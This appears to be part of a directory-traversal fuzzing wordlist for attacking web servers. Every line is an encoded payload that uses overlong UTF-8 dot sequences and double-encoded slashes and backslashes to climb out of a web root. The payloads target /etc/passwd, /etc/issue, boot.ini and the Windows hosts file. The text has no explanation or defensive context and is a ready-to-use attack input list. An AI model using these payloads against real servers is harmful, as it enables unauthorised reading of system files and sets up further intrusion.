-%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cetc0x5cissue -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cboot.ini -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cetc0x5cpasswd -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cetc0x5cissue -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cboot.ini -%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5c%25c0%25ae%25c0%25ae0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%25c0%25ae%25c0%25ae%252fetc%252fpasswd -%25c0%25ae%25c0%25ae%252fetc%252fissue -%25c0%25ae%25c0%25ae%252fboot.ini -%25c0%25ae%25c0%25ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fetc%252fpasswd -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fetc%252fissue -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fboot.ini -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fetc%252fpasswd -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fetc%252fissue -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fboot.ini -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fetc%252fpasswd -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fetc%252fissue -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fboot.ini -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fetc%252fpasswd -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fetc%252fissue -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fboot.ini -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fetc%252fpasswd -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fetc%252fissue -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fboot.ini -%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252f%25c0%25ae%25c0%25ae%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%25c0%25ae%25c0%25ae%255cetc%255cpasswd -%25c0%25ae%25c0%25ae%255cetc%255cissue -%25c0%25ae%25c0%25ae%255cboot.ini -%25c0%25ae%25c0%25ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cetc%255cpasswd -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cetc%255cissue -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cboot.ini -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cetc%255cpasswd -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cetc%255cissue -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cboot.ini -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cetc%255cpasswd -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cetc%255cissue -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cboot.ini -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cetc%255cpasswd -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cetc%255cissue -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cboot.ini -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cetc%255cpasswd -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cetc%255cissue -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cboot.ini -%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255c%25c0%25ae%25c0%25ae%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fpasswd -%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fissue -%25c0%25ae%25c0%25ae%c0%2fboot.ini -%25c0%25ae%25c0%25ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fpasswd -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fissue -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fboot.ini -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fpasswd -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fissue -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fboot.ini -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fpasswd -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fissue -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fboot.ini -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fpasswd -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fissue -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fboot.ini -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fpasswd -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fissue -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fboot.ini -%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2f%25c0%25ae%25c0%25ae%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%25c0%25ae%25c0%25ae%c0%afetc%c0%afpasswd -%25c0%25ae%25c0%25ae%c0%afetc%c0%afissue -%25c0%25ae%25c0%25ae%c0%afboot.ini -%25c0%25ae%25c0%25ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afetc%c0%afpasswd -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afetc%c0%afissue -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afboot.ini -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afetc%c0%afpasswd -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afetc%c0%afissue -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afboot.ini -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afetc%c0%afpasswd -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afetc%c0%afissue -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afboot.ini -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afetc%c0%afpasswd -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afetc%c0%afissue -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afboot.ini -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afetc%c0%afpasswd -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afetc%c0%afissue -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afboot.ini -%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%af%25c0%25ae%25c0%25ae%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cpasswd -%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cissue -%25c0%25ae%25c0%25ae%c0%5cboot.ini -%25c0%25ae%25c0%25ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cpasswd -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cissue -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cboot.ini -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cpasswd -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cissue -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cboot.ini -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cpasswd -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cissue -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cboot.ini -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cpasswd -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cissue -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cboot.ini -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cpasswd -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cissue -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cboot.ini -%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5c%25c0%25ae%25c0%25ae%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cpasswd -%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cissue -%25c0%25ae%25c0%25ae%c1%9cboot.ini -%25c0%25ae%25c0%25ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cpasswd -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cissue -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cboot.ini -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cpasswd -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cissue -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cboot.ini -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cpasswd -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cissue -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cboot.ini -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cpasswd -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cissue -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cboot.ini -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cpasswd -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cissue -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cboot.ini -%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9c%25c0%25ae%25c0%25ae%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcpasswd -%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcissue -%25c0%25ae%25c0%25ae%c1%pcboot.ini -%25c0%25ae%25c0%25ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcpasswd -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcissue -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcboot.ini -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcpasswd -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcissue -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcboot.ini -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcpasswd -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcissue -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcboot.ini -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pc%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcpasswd 